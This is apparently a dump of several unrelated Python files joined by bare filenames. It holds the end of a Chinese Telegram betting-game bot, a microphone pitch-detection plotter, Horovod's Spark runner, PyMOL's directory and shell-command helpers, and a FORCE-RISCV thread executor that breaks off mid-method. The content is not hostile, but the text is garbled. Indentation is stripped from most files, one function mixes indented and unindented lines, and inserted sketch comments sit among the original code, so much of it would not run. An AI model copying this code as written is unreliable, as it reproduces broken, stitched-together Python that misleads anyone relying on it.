self.sm[i]+=1
if self.sm[i]==5:
self.horsest[i]=(self.horsest[i][0],0)
return
def EndGame(self):
mess="赛马"
mst=["🏇","☠️","🐎"]
info="?123456"
for i in self.horsest:
tx=" "*max(50-self.horsest[i][0],0)
tx+=mst[self.horsest[i][1]]
tx+=str(i)
mess+="\n"+tx
user={}
for i in self.player:
ob={"mess":"🐴"+info[self.playerst[i]]}
if self.playerst[i]==0:
ob["money"]=self.player[i]["money"]
elif self.horsest[self.playerst[i]][0]==50 and self.horsest[self.playerst[i]][1]==0:
ob["money"]=self.player[i]["money"]*2
else:
ob["money"]=0
user[i]=ob
return (mess,user)
class GameBlackJackObj(object):
def __init__(self,userlist):
self.vall=[0,1,2,3,4,5,6,7,8,9,10,10,10,10]
self.Redst=["x","A","2","3","4","5","6","7","8","9","10","J","Q","K"]
self.player=userlist
self.playerst={}
self.playerok={}
self.NeedUpdate=True
self.NeedEnd=False
self.lastime=time.time()
self.rdlib=__import__("random").SystemRandom()
self.zjst=[self.rdlib.randint(1,13),self.rdlib.randint(1,13)]
while self.cal(self.zjst)[1]<17:
self.zjst.append(self.rdlib.randint(1,13))
for i in userlist:
self.playerst[i]=[self.rdlib.randint(1,13),self.rdlib.randint(1,13)]
self.playerok[i]=0
if self.cal(self.playerst[i])[1]==21:
self.playerok[i]=2
def cal(self,arr):
ret=[0,0]
for i in arr:
ret[1]+=self.vall[i]
if i==1:
ret[0]+=1
if ret[1]<=11 and ret[0]>0:
ret[1]+=10
return tuple(ret)
def arr2str(self,arr):
st=""
for i in arr:
st+=self.Redst[i]+" "
return st
def GenMess(self):
mess="21点"
sta=["未完成","已完成","黑杰克","爆炸"]
mess+="\n庄家: "+self.Redst[self.zjst[0]]+" ?"
for i in self.player:
mess+="\n"+self.player[i]["name"]+"("+str(self.player[i]["money"])+"): "+self.arr2str(self.playerst[i])+sta[self.playerok[i]]
return mess
def GenButton(self,chatid):
return [[{"text":"要牌","callback_data":str(chatid)+"+Y"},
{"text":"完成","callback_data":str(chatid)+"+N"}
],
[{"text":"强制结束","callback_data":str(chatid)+"+E"}]]
def UserCmd(self,uid,action):
if action=="E":
if time.time()-self.lastime>15:
self.NeedEnd=True
return
if self.NeedEnd:
return
if not uid in self.player:
return
if self.playerok[uid]!=0:
return
if action=='Y':
self.playerst[uid].append(self.rdlib.randint(1,13))
cc=self.cal(self.playerst[uid])
if cc[1]>21:
self.playerok[uid]=3
if action=='N':
self.playerok[uid]=1
self.NeedUpdate=True
self.lastime=time.time()
return
def NextTick(self):
nmsl=True
for i in self.playerok:
if self.playerok[i]==0:
nmsl=False
self.NeedEnd|=nmsl
return
def EndGame(self):
mess="21点"
sta=["失败","胜利","黑杰克","爆炸","平局"]
mess+="\n庄家: "+self.arr2str(self.zjst)
user={}
zjd=self.cal(self.zjst)
for i in self.player:
ob={"mess":self.arr2str(self.playerst[i])}
nmsl=self.playerok[i]
if self.playerok[i]==3:
ob["money"]=0
elif self.playerok[i]==2:
ob["money"]=int(self.player[i]["money"]*2.5)
else:
if zjd[1]>21 or self.cal(self.playerst[i])[1]>zjd[1]:
ob["money"]=self.player[i]["money"]*2
nmsl=1
elif self.cal(self.playerst[i])[1]==zjd[1]:
ob["money"]=self.player[i]["money"]
nmsl=4
else:
ob["money"]=0
nmsl=0
ob["mess"]+=sta[nmsl]
user[i]=ob
return (mess,user)
GameObjList={
"dice":{"cmd":"/dice","obj":GameDiceObj,"name":"骰子"},
"horse":{"cmd":"/horse","obj":GameHorseObj,"name":"赛马"},
"blackjack":{"cmd":"/blackjack","obj":GameBlackJackObj,"name":"21点"}
}
Cmd2Game={}
for i in GameObjList:
Cmd2Game[GameObjList[i]["cmd"]]=i
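# Adding a new game (illustrative sketch, not present in the original code):
# any object implementing the duck-typed interface used above --
# __init__(userlist), GenMess(), GenButton(chatid), UserCmd(uid, action),
# NextTick(), and EndGame() returning (message, {uid: {"mess":..., "money":...}})
# -- can be registered the same way, e.g.
#   GameObjList["coin"] = {"cmd": "/coin", "obj": GameCoinObj, "name": "Coin flip"}
# where GameCoinObj is a hypothetical class following that interface.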
# Game end
def GenBetButton(chatid):
return [[{"text":"5","callback_data":str(chatid)+"+*X5"},
{"text":"10","callback_data":str(chatid)+"+*X10"},
{"text":"50","callback_data":str(chatid)+"+*X50"},
{"text":"50%","callback_data":str(chatid)+"+*X50%"},
{"text":"sh","callback_data":str(chatid)+"+*Xsh"}
],
[{"text":"Start","callback_data":str(chatid)+"+*S"},{"text":"余额","callback_data":str(chatid)+"+*M"}]]
AliveGame={}
def DoBet(userobj,chatid,st):
uid=userobj["id"]
global AliveGame,UserInfo,SendReqIDMap
if st=="sh":
st=str(GetUserInfo(uid))
if re.match("(^[1-9][0-9]{0,1}%$|^100%$)",st):
fa=int(int(st[:-1])/100.0*GetUserInfo(uid))
st=str(fa)
if not re.match("^[1-9][0-9]*$",st):
return (-1,"无法识别投注金额")
if not chatid in AliveGame:
return (-1,"无进行中游戏")
if not AliveGame[chatid]["status"]==0:
return (-1,"游戏状态错误")
mon=int(st)
if mon>GetUserInfo(uid):
return (-1,"余额不足")
ChangeUserInfo(uid,-mon)
if not uid in AliveGame[chatid]["player"]:
AliveGame[chatid]["player"][uid]={"money":0,"name":userobj["first_name"]}
AliveGame[chatid]["player"][uid]["money"]+=mon
if AliveGame[chatid]["messid"]<0:
sbsb=AliveGame[chatid]["messid"]
if not sbsb in SendReqIDMap:
return (-1,"消息未发出")
AliveGame[chatid]["messid"]=SendReqIDMap[AliveGame[chatid]["messid"]]
SendReqIDMap.pop(sbsb)
typ=AliveGame[chatid]["typ"]
mess=GameObjList[typ]["name"]+"\n玩家"
for i in AliveGame[chatid]["player"]:
mess+="\n"+AliveGame[chatid]["player"][i]["name"]+": "+str(AliveGame[chatid]["player"][i]["money"])+"("+str(GetUserInfo(i))+")"
UpdateMessage(mess,chatid,AliveGame[chatid]["messid"],button={"inline_keyboard":GenBetButton(chatid)})
return (0,"下注成功")
def StartGame(chatid,typ):
global AliveGame,SendReqIDTot
if chatid in AliveGame:
if AliveGame[chatid]["messid"]<0:
sbsb=AliveGame[chatid]["messid"]
if sbsb in SendReqIDMap:
AliveGame[chatid]["messid"]=SendReqIDMap[AliveGame[chatid]["messid"]]
SendReqIDMap.pop(sbsb)
SendMessage("上一局游戏还未结束 无法新建",chatid,reply=AliveGame[chatid]["messid"])
return
obj={"typ":typ,"player":{},"status":0,"messid":SendReqIDTot}
AliveGame[chatid]=obj
SendMessage(GameObjList[typ]["name"],chatid,button={"inline_keyboard":GenBetButton(chatid)},reqid=SendReqIDTot)
SendReqIDTot-=1
return
def EndGame(chatid):
global AliveGame
(mess,chang)=AliveGame[chatid]["game"].EndGame()
AliveGame[chatid]["game"].NeedUpdate=False
#player
for i in chang:
ChangeUserInfo(i,chang[i]["money"])
usm=GetUserInfo(i)
mess+="\n"+AliveGame[chatid]["player"][i]["name"]+"("+str(AliveGame[chatid]["player"][i]["money"])+"): "+chang[i]["mess"]+" +"+str(chang[i]["money"])+"("+str(usm)+")"
UpdateMessage(mess,chatid,AliveGame[chatid]["messid"])
return
def UpdateGame(chatid):
AliveGame[chatid]["game"].NeedUpdate=False
mess=AliveGame[chatid]["game"].GenMess()
but={"inline_keyboard":AliveGame[chatid]["game"].GenButton(chatid)}
UpdateMessage(mess,chatid,AliveGame[chatid]["messid"],button=but)
return
def DoCommand(obj):
if not "text" in obj:
return
txt=obj["text"]
if len(txt)<1 or txt[0]!='/':
return
cmdall=txt.split(' ')
cmd=cmdall[0]
if cmd.find("@")!=-1:
botname=cmd[cmd.find("@"):]
if botname!="@"+BOTNAME:
return
cmd=cmd.replace("@"+BOTNAME,"")
if cmd=="/help" or cmd=="/start":
SendMessage(HELPMESSAGE,obj["chat"]["id"])
if cmd in Cmd2Game:
StartGame(obj["chat"]["id"],Cmd2Game[cmd])
if cmd=="/bet":
if len(cmdall)>1:
res=DoBet(obj["from"],obj["chat"]["id"],cmdall[1])
if res[0]==0:
retx="成功 "
else:
retx="错误 "
retx+=res[1]
SendMessage(retx,obj["chat"]["id"],reply=obj["message_id"])
if cmd=='/del':
global AliveGame
if obj["chat"]["id"] in AliveGame:
AliveGame.pop(obj["chat"]["id"])
SendMessage("已重置",obj["chat"]["id"])
if PY:
if cmd=='/py':
mm=__import__("random").randint(-100,1000)
GetUserInfo(obj["from"]["id"])
ChangeUserInfo(obj["from"]["id"],mm)
SendMessage("pyed: "+str(mm),obj["chat"]["id"],reply=obj["message_id"])
return
def DoButton(obj):
global AliveGame
if (not "data" in obj) or len(obj["data"])<1:
return
dat=obj["data"].split('+')
if len(dat)<2 or (not re.match("^[-]*[1-9][0-9]*$",dat[0])):
AnswerCallback(obj["id"],"非法请求")
return
cid=int(dat[0])
if not cid in AliveGame:
AnswerCallback(obj["id"],"无进行中的游戏")
return
txt=dat[1]
if AliveGame[cid]["status"]==0:
if txt[0]!='*':
return
if txt[1]=='X':
res=DoBet(obj["from"],cid,txt[2:])
sta=False
if res[0]==0:
retx="成功 "
else:
retx="错误 "
sta=True
retx+=res[1]
AnswerCallback(obj["id"],retx,isalert=sta)
elif txt[1]=='M':
AnswerCallback(obj["id"],"余额: "+str(GetUserInfo(obj["from"]["id"])),isalert=True)
elif txt[1]=='S':
if not AliveGame[cid]["player"]:
AnswerCallback(obj["id"],"没人上车")
return
AliveGame[cid]["game"]=GameObjList[AliveGame[cid]["typ"]]["obj"](AliveGame[cid]["player"])
AliveGame[cid]["status"]=1
AnswerCallback(obj["id"])
else:
ret=AliveGame[cid]["game"].UserCmd(obj["from"]["id"],txt)
if ret is None:
AnswerCallback(obj["id"])
else:
AnswerCallback(obj["id"],ret[0],ret[1])
return
def DoChange(cz):
if "message" in cz:
DoCommand(cz["message"])
elif "callback_query" in cz:
DoButton(cz["callback_query"])
return
def ThErr():
if DEBUG:
ex_type, ex_val, ex_stack = sys.exc_info()
print(ex_type)
print(ex_val)
for stack in traceback.extract_tb(ex_stack):
print(stack)
print(ex_type,file=sys.stderr)
print(ex_val,file=sys.stderr)
for stack in traceback.extract_tb(ex_stack):
print(stack,file=sys.stderr)
#main
def main():
while True:
sttime=time.time()
ch=GetChange()
#print(ch)
for cz in ch:
DoChange(cz)
nend=[]
for i in AliveGame:
if "game" in AliveGame[i]:
try:
AliveGame[i]["game"].NextTick()
if AliveGame[i]["game"].NeedEnd:
EndGame(i)
nend.append(i)
if AliveGame[i]["game"].NeedUpdate:
UpdateGame(i)
except:
logger.error("Update Game")
if DEBUG:
ThErr()
for i in nend:
AliveGame.pop(i)
edtime=time.time()
if DEBUG:
print(edtime-sttime)
net=max(2-edtime+sttime,0)
time.sleep(net)
try:
main()
except:
ThErr()
exit(0)
|
main.py
|
import sys
import time
import numpy as np
import random
import matplotlib.pyplot as plt
import queue
import matplotlib.animation as animation
import threading
from scipy.io.wavfile import read as wavread
from scipy.signal import blackmanharris
from pysoundcard import *
from math import log
from sys import float_info
from collections import deque
"""
This function takes a numpy vector that represents the sampled sound from the stream, and processes it.
"""
def get_frequency(in_data, chunk):
    # Window the first input channel and take the real FFT
    windowed = in_data[:,0] * blackmanharris(len(in_data))
    data_after_fft = np.fft.rfft(windowed)
    # Find the peak bin
    i = np.argmax(abs(data_after_fft))
    # Convert to equivalent frequency
    # TODO: calibrate the frequency so it shows up in Hz, this is not the right calculation
    thefreq = chunk * i / len(windowed)
    # Magnitudes in decibels; abs() is required because the FFT output is complex
    data_in_decibels = map(lambda x: -30 if abs(x) < sys.float_info.min else 20 * log(abs(x), 10), data_after_fft)
# TODO: a more accurate method would be to use quadratic interpolation around this value to get a better estimate of where the maximum is
# TODO: the code iterates through the chunk again needlessly to find the peak intensity. Improve the algorithm.
peak_intensity = max(data_in_decibels)
return thefreq, peak_intensity
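# A sketch of the quadratic-interpolation TODO above (added for illustration,
# not part of the original file): fitting a parabola through the log-magnitudes
# of the three bins around the peak refines the peak position by a sub-bin
# offset. The 44100 Hz sample rate and 2048-point FFT below are assumptions
# matching the Stream created further down.
def refined_peak_hz(log_mags, i, sample_rate=44100, fft_size=2048):
    # log_mags: indexable sequence of log-magnitudes, e.g. list(data_in_decibels)
    if i <= 0 or i >= len(log_mags) - 1:
        # Edge bins cannot support a three-point fit; fall back to the raw bin
        return i * sample_rate / fft_size
    a, b, c = log_mags[i - 1], log_mags[i], log_mags[i + 1]
    # Vertex of the parabola through (-1, a), (0, b), (1, c)
    offset = 0.5 * (a - c) / (a - 2 * b + c)
    return (i + offset) * sample_rate / fft_size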
"""
The API for the sound input operates on callbacks. A function like this needs to be provided to the constructor:
def simple_callback(in_data, frame_count, time_info, status):
print(get_frequency(in_data, frame_count, 2048))
return (in_data, continue_flag)
which is then called asynchronously after the chunk of input is received.
"""
def make_callback_that_puts_into_queue(queue):
def callback(in_data, frame_count, time_info, status):
frequency, intensity = get_frequency(in_data, block_length)
queue.put((frequency, intensity))
return (in_data, continue_flag)
return callback
queue_for_the_stream = queue.Queue()
# FFT works best when the block length is a power of two.
block_length = 2048
s = Stream(sample_rate=44100, block_length=block_length,output_device=False, callback=make_callback_that_puts_into_queue(queue_for_the_stream))
s.start()
"""
The input part of the code finishes here. The input gets taken from the stream, transformed and placed into a queue.
We can retrieve the data with the queue.get() operation. The operation works very nicely, because if the queue is empty, it blocks until it can receive an input.
"""
"""
A simple implementation of a display.
We store the incoming data into a buffer. One thread fills the buffer constantly, the other redraws the buffer as fast as it can.
"""
buffer_size = 20
buffer = deque([0]*buffer_size, maxlen=buffer_size)
# let the thread add elements to the queue in a loop.
#TODO: think of a better implementation that doesn't involve a separate thread and time.sleep().
def keepFillingTheBuffer(queue,buffer):
while True:
time.sleep(0.03) # 0.03 is about half the time between successive chunks appearing.
        frequency, intensity = queue.get()
        buffer.append(frequency)
t= threading.Thread(target=keepFillingTheBuffer, args = (queue_for_the_stream, buffer))
t.daemon=True
t.start()
"""
This makes an animation using matplotlib. Shamelessly copypasted and slightly adapted.
"""
fig = plt.figure()
ax = plt.axes(xlim=(0, 20), ylim=(10, 160))
line, = ax.plot([], [], lw=2)
def init():
line.set_data([], [])
return line,
def make_animate( buffer, queue):
def animate(i):
x = np.linspace(0, buffer_size, buffer_size)
y = list(buffer)
line.set_data(x, y)
return line,
return animate
animate = make_animate(buffer, queue_for_the_stream)
# call the animator. blit=True means only re-draw the parts that have changed.
anim = animation.FuncAnimation(fig, animate, init_func=init, blit=True)
plt.show()
#TODO: implement stopping after a keystroke as opposed to ctrl+c.
time.sleep(1000)
s.stop()
"""
I experimented with the callback function that takes an object responsible for plotting.
The problem was that the plotting might be slower than incoming data, so you can't redraw every time you receive a chunk.
class DrawingBuffer:
def __init__(self, bufferSize):
#self.buffer = deque([-30]*bufferSize, maxlen=bufferSize)
self.bufferSize = bufferSize
self.current = 0
plt.axis([0, bufferSize, 0, 200])
plt.ion()
plt.show()
def newFrame(self, frequency, intensity): # for now do nothing with intensity
self.current = (self.current + 1 ) % self.bufferSize
plt.scatter(self.current, frequency)
plt.draw()
def make_callback_that_draws(drawing_object):
def callback(in_data, frame_count, time_info, status):
drawing_object.newFrame(*get_frequency(in_data, frame_count, block_length))
return (in_data, continue_flag)
return callback
"""
|
runner.py
|
# Copyright 2019 Uber Technologies, Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import os
import platform
import threading
import pyspark
from six.moves import queue
from horovod.spark.task import task_service
from horovod.spark.gloo_run import gloo_run
from horovod.spark.mpi_run import mpi_run
from horovod.run.runner import run_controller
from horovod.run.common.util import timeout, host_hash, secret
from horovod.run.common.util import settings as hvd_settings
from horovod.spark.driver import driver_service, job_id
# Spark will fail to initialize correctly locally on Mac OS without this
if platform.system() == 'Darwin':
os.environ['OBJC_DISABLE_INITIALIZE_FORK_SAFETY'] = 'YES'
def _task_fn(index, driver_addresses, key, settings, use_gloo):
    # When deserialized on Spark workers, settings do not contain the key, so it is given here
    # explicitly. Spark RPC communicates the key and supports encryption; for convenience, we
    # put it back into settings.
settings.key = key
task = task_service.SparkTaskService(index, settings.key, settings.nics, settings.verbose)
try:
driver_client = driver_service.SparkDriverClient(driver_addresses, settings.key, settings.verbose)
driver_client.register_task(index, task.addresses(), host_hash.host_hash())
task.wait_for_initial_registration(settings.timeout)
# Tasks ping each other in a circular fashion to determine interfaces reachable within
# the cluster.
next_task_index = (index + 1) % settings.num_proc
next_task_addresses = driver_client.all_task_addresses(next_task_index)
# We request interface matching to weed out all the NAT'ed interfaces.
next_task_client = \
task_service.SparkTaskClient(next_task_index, next_task_addresses,
settings.key, settings.verbose,
match_intf=True)
driver_client.register_task_to_task_addresses(next_task_index, next_task_client.addresses())
task_indices_on_this_host = driver_client.task_host_hash_indices(
host_hash.host_hash())
# With Gloo all tasks wait for the command
# With MPI task with first index executes orted which will run mpirun_exec_fn for all tasks.
if use_gloo or task_indices_on_this_host[0] == index:
task.wait_for_command_start(settings.timeout)
task.wait_for_command_termination()
else:
# The rest of tasks need to wait for the first task to finish.
first_task_addresses = driver_client.all_task_addresses(task_indices_on_this_host[0])
first_task_client = \
task_service.SparkTaskClient(task_indices_on_this_host[0],
first_task_addresses, settings.key,
settings.verbose)
first_task_client.wait_for_command_termination()
return task.fn_result()
finally:
task.shutdown()
def _make_mapper(driver_addresses, settings, use_gloo):
# serialised settings do not have a key so we have to copy it and provide it explicitly here
key = settings.key
def _mapper(index, _):
yield _task_fn(index, driver_addresses, key, settings, use_gloo)
return _mapper
def _make_spark_thread(spark_context, spark_job_group, driver, result_queue,
settings, use_gloo):
"""Creates `settings.num_proc` Spark tasks in a parallel thread."""
def run_spark():
"""Creates `settings.num_proc` Spark tasks, each executing `_task_fn` and waits for them to terminate."""
try:
spark_context.setJobGroup(spark_job_group,
"Horovod Spark Run",
interruptOnCancel=True)
procs = spark_context.range(0, numSlices=settings.num_proc)
            # We assume that folks caring about security will enable Spark RPC encryption,
            # thus ensuring that the key that is passed here remains secret.
result = procs.mapPartitionsWithIndex(_make_mapper(driver.addresses(), settings, use_gloo)).collect()
result_queue.put(result)
except:
driver.notify_spark_job_failed()
raise
spark_thread = threading.Thread(target=run_spark)
spark_thread.start()
return spark_thread
def _launch_job(use_mpi, use_gloo, settings, driver, env, stdout=None, stderr=None):
# Determine a set of common interfaces for task-to-task communication.
nics = set(driver.task_addresses_for_tasks(0).keys())
for index in range(1, settings.num_proc):
nics.intersection_update(driver.task_addresses_for_tasks(index).keys())
if not nics:
raise Exception('Unable to find a set of common task-to-task communication interfaces: %s'
% [(index, driver.task_addresses_for_tasks(index)) for index in range(settings.num_proc)])
run_controller(use_gloo, lambda: gloo_run(settings, nics, driver, env),
use_mpi, lambda: mpi_run(settings, nics, driver, env, stdout, stderr),
False, lambda: None,
settings.verbose)
def run(fn, args=(), kwargs={}, num_proc=None, start_timeout=None,
use_mpi=None, use_gloo=None, extra_mpi_args=None,
env=None, stdout=None, stderr=None, verbose=1, nics=None):
"""
Runs Horovod in Spark. Runs `num_proc` processes executing `fn` using the same amount of Spark tasks.
Args:
fn: Function to run.
args: Arguments to pass to `fn`.
kwargs: Keyword arguments to pass to `fn`.
num_proc: Number of Horovod processes. Defaults to `spark.default.parallelism`.
start_timeout: Timeout for Spark tasks to spawn, register and start running the code, in seconds.
If not set, falls back to `HOROVOD_SPARK_START_TIMEOUT` environment variable value.
If it is not set as well, defaults to 600 seconds.
extra_mpi_args: Extra arguments for mpi_run. Defaults to no extra args.
env: Environment dictionary to use in Horovod run.
stdout: Horovod stdout is redirected to this stream. Defaults to sys.stdout.
stderr: Horovod stderr is redirected to this stream. Defaults to sys.stderr.
verbose: Debug output verbosity (0-2). Defaults to 1.
nics: List of NICs for tcp network communication.
Returns:
List of results returned by running `fn` on each rank.
"""
if start_timeout is None:
# Lookup default timeout from the environment variable.
start_timeout = int(os.getenv('HOROVOD_SPARK_START_TIMEOUT', '600'))
# nics needs to be a set
if nics and not isinstance(nics, set):
nics = set(nics)
tmout = timeout.Timeout(start_timeout,
message='Timed out waiting for {activity}. Please check that you have '
'enough resources to run all Horovod processes. Each Horovod '
'process runs in a Spark task. You may need to increase the '
'start_timeout parameter to a larger value if your Spark resources '
'are allocated on-demand.')
settings = hvd_settings.Settings(verbose=verbose,
extra_mpi_args=extra_mpi_args,
key=secret.make_secret_key(),
timeout=tmout,
nics=nics,
run_func_mode=True)
spark_context = pyspark.SparkContext._active_spark_context
if spark_context is None:
raise Exception('Could not find an active SparkContext, are you '
'running in a PySpark session?')
if num_proc is None:
num_proc = spark_context.defaultParallelism
if settings.verbose >= 1:
print('Running %d processes (inferred from spark.default.parallelism)...' % num_proc)
else:
if settings.verbose >= 1:
print('Running %d processes...' % num_proc)
settings.num_proc = num_proc
result_queue = queue.Queue(1)
# start Spark driver service and launch settings.num_proc Spark tasks
spark_job_group = 'horovod.spark.run.%d' % job_id.next_job_id()
driver = driver_service.SparkDriverService(settings.num_proc, fn, args, kwargs,
settings.key, settings.nics)
spark_thread = _make_spark_thread(spark_context, spark_job_group, driver,
result_queue, settings, use_gloo)
try:
# wait for all tasks to register and notify them
driver.wait_for_initial_registration(settings.timeout)
if settings.verbose >= 2:
print('Initial Spark task registration is complete.')
task_clients = [
task_service.SparkTaskClient(index,
driver.task_addresses_for_driver(index),
settings.key, settings.verbose)
for index in range(settings.num_proc)]
for task_client in task_clients:
task_client.notify_initial_registration_complete()
driver.wait_for_task_to_task_address_updates(settings.timeout)
if settings.verbose >= 2:
print('Spark task-to-task address registration is complete.')
# Determine the index grouping based on host hashes.
# Barrel shift until index 0 is in the first host.
host_hashes = list(driver.task_host_hash_indices().keys())
host_hashes.sort()
while 0 not in driver.task_host_hash_indices()[host_hashes[0]]:
host_hashes = host_hashes[1:] + host_hashes[:1]
settings.hosts = ','.join('%s:%d' % (host_hash, len(driver.task_host_hash_indices()[host_hash]))
for host_hash in host_hashes)
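# Illustrative example: if host_hashes is ['hash-a', 'hash-b'], rank 0 lives on
# 'hash-b', and each host runs two tasks, the rotation above yields
# ['hash-b', 'hash-a'] and settings.hosts becomes 'hash-b:2,hash-a:2'.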
# Determine the rank-to-index mapping.
ranks_to_indices = []
for host_hash in host_hashes:
ranks_to_indices += driver.task_host_hash_indices()[host_hash]
driver.set_ranks_to_indices(ranks_to_indices)
# Run the job
_launch_job(use_mpi, use_gloo, settings, driver, env, stdout, stderr)
except:
# Terminate Spark job.
spark_context.cancelJobGroup(spark_job_group)
# Re-raise exception.
raise
finally:
spark_thread.join()
driver.shutdown()
# Make sure Spark Job did not fail.
driver.check_for_spark_job_failure()
# If there's no exception, execution results are in this queue.
results = result_queue.get_nowait()
return [results[index] for index in ranks_to_indices]
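# --- Illustrative usage sketch; not part of the module above ---
# A minimal, hedged example of invoking run(). The training function and its
# argument are hypothetical placeholders, and an active SparkContext plus a
# Horovod-enabled framework (here horovod.torch) are assumed:
#
#     import horovod.spark
#
#     def train(magic_number):
#         import horovod.torch as hvd
#         hvd.init()
#         return hvd.rank() + magic_number
#
#     results = horovod.spark.run(train, args=(42,), num_proc=4, verbose=2)
#     # results[i] is the value returned by the process with rank i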
|
externing.py
|
#A* -------------------------------------------------------------------
#B* This file contains source code for the PyMOL computer program
#C* Copyright (c) Schrodinger, LLC.
#D* -------------------------------------------------------------------
#E* It is unlawful to modify or remove this copyright notice.
#F* -------------------------------------------------------------------
#G* Please see the accompanying LICENSE file for further information.
#H* -------------------------------------------------------------------
#I* Additional authors of this source file include:
#-*
#-*
#-*
#Z* -------------------------------------------------------------------
if __name__=='pymol.externing':
import os
import pymol
import string
import parsing
import threading
import cmd
import traceback
from glob import glob
from cmd import _cmd,lock,unlock,Shortcut,QuietException, \
_feedback,fb_module,fb_mask, exp_path, \
DEFAULT_ERROR, DEFAULT_SUCCESS, _raising, is_ok, is_error
def cd(dir="~",complain=1,quiet=1):
'''
DESCRIPTION
"cd" changes the current working directory.
USAGE
cd <path>
SEE ALSO
pwd, ls, system
'''
dir = exp_path(dir)
try:
os.chdir(dir) # raises on error
if not quiet:
print " cd: now in %s"%os.getcwd()
except:
if complain:
traceback.print_exc()
return DEFAULT_SUCCESS
def pwd():
'''
DESCRIPTION
Print current working directory.
USAGE
pwd
SEE ALSO
cd, ls, system
'''
print os.getcwd()
return DEFAULT_SUCCESS
def ls(pattern=None):
'''
DESCRIPTION
List contents of the current working directory.
USAGE
ls [pattern]
dir [pattern]
EXAMPLES
ls
ls *.pml
SEE ALSO
cd, pwd, system
'''
if pattern==None:
pattern = "*"
else:
pattern = exp_path(pattern)
if '*' not in pattern:
lst = glob(os.path.join(pattern, '*'))
else:
lst = []
if not len(lst):
lst = glob(pattern)
if len(lst):
lst.sort()
lst = parsing.list_to_str_list(lst)
for a in lst:
print a
else:
print " ls: Nothing found. Is that a valid path?"
return DEFAULT_SUCCESS
def system(command,async=0,_self=cmd):
'''
DESCRIPTION
"system" executes a command in a subshell under Unix or Windows.
USAGE
system command
PYMOL API
cmd.system(string command,int async=0)
NOTES
async can only be specified from the Python level (not the command language)
if async is 0 (default), then the result code from "system" is returned in r
if async is 1, then the command is run in a separate thread whose object is
returned
SEE ALSO
ls, cd, pwd
'''
r = None
if async:
r = threading.Thread(target=_cmd.system,args=(str(command),1))
r.start()
else:
r = _cmd.system(_self._COb,str(command),0)
return r # special meaning
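# Illustrative usage sketch (hypothetical shell commands; not part of the module):
#
#     cmd.system("ls -l")              # blocks and returns the exit code
#     t = cmd.system("make", async=1)  # returns the running Thread object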
def paste(_self=cmd): # INTERNAL
r=DEFAULT_SUCCESS
lst = []
if hasattr(pymol,"machine_get_clipboard"):
lst = pymol.machine_get_clipboard()
if len(lst):
new_lst = []
for a in lst:
while len(a):
if ord(a[-1])>32:
break
else:
a=a[:-1]
# if nothing in the queue, this special string is printed; so
# we ignore it
if len(a):
if a=="""PRIMARY selection doesn't exist or form "STRING" not defined""":
pass  # ignore the clipboard-empty placeholder string
else:
new_lst.append(a)
r = _cmd.paste(_self._COb,new_lst)
if _raising(r,_self): raise pymol.CmdException
return r
|
GenThreadExecutor.py
|
#
# Copyright (C) [2020] Futurewei Technologies, Inc.
#
# FORCE-RISCV is licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# THIS SOFTWARE IS PROVIDED ON AN "AS IS" BASIS, WITHOUT WARRANTIES OF ANY KIND, EITHER
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO NON-INFRINGEMENT, MERCHANTABILITY OR
# FIT FOR A PARTICULAR PURPOSE.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import abc
import threading
import traceback
from ThreadDispatcher import ThreadDispatcher, SingleThreadDispatcher, MultiThreadDispatcher
import Log
## @package GenThreadExecutor
#
# Provides two kinds of generator-thread executors: one for single-thread test generation and one for multi-thread test generation.
## Abstract base class for GenThreadExecutor
#
class GenThreadExecutor(abc.ABC):
## Common base __init__ method.
def __init__(self):
self.mSingleThreadDispatcher = SingleThreadDispatcher()
def getDispatcher(self):
return self.mSingleThreadDispatcher
## Notify the executor of the main generator thread ID for the before and after main test
# processing.
def setMainThreadId(self, aThreadId):
self.mSingleThreadDispatcher.addThreadId(aThreadId)
## Interface method to execute generator threads.
#
@abc.abstractmethod
def executeGenThreads(self, aGenThreads):
raise NotImplementedError
## Static method used by base classes to execute a generator thread.
#
@staticmethod
def executeGenThread(aGenThread):
try:
aGenThread.setup()
aGenThread.generate()
aGenThread.cleanUp()
except Exception as exc:
err_str = traceback.format_exception_only(type(exc), exc)[-1]
err_str += ''.join(traceback.format_tb(exc.__traceback__))
Log.fail(err_str)
## Generator executor class for single-thread test generation.
#
class SingleGenThreadExecutor(GenThreadExecutor):
def __init__(self):
super().__init__()
## Execute single generator thread
#
def executeGenThreads(self, aGenThreads):
# To avoid unnecessarily impairing performance for the case where there is only one GenThread, execute it on
# the main thread
assert (len(aGenThreads) == 1), 'SingleGenThreadExecutor was used to execute more than one GenThread!'
return GenThreadExecutor.executeGenThread(aGenThreads[0])
## Generator executor class for multi-thread test generation.
#
class MultiGenThreadExecutor(GenThreadExecutor):
## Setup multi-thread dispatcher.
#
def __init__(self):
super().__init__()
self.mMultiThreadDispatcher = MultiThreadDispatcher()
self.mGenThreads = None
## Execute the generator threads in pseudo random concurrent fashion.
#
def executeGenThreads(self, aGenThreads):
ex_threads = []
self.mGenThreads = aGenThreads
start_barrier = threading.Barrier(len(aGenThreads))
for gen_thread in aGenThreads:
ex_thread = threading.Thread(target=MultiGenThreadExecutor.executeGenThreadControlledStart, args=[gen_thread, self.mMultiThreadDispatcher, start_barrier])
ex_threads.append(ex_thread)
with ThreadingEnableContextManager(self):
for ex_thread in ex_threads:
ex_thread.start()
for ex_thread in ex_threads:
ex_thread.join()
@staticmethod
def executeGenThreadControlledStart(aGenThread, aDispatcher, aStartBarrier):
with ExecutionContextManager(aGenThread.genThreadID, aDispatcher, aStartBarrier):
GenThreadExecutor.executeGenThread(aGenThread)
## Use this context manager to control swapping in and out the multi-threading API call dispatcher.
#
class ThreadingEnableContextManager:
def __init__(self, executor):
self.mExecutor = executor
## Iterate through all GenThread objects to set their dispatcher to the multi-thread one.
#
def __enter__(self):
ThreadDispatcher.setCurrentDispatcher(self.mExecutor.mMultiThreadDispatcher)
for gen_thread in self.mExecutor.mGenThreads:
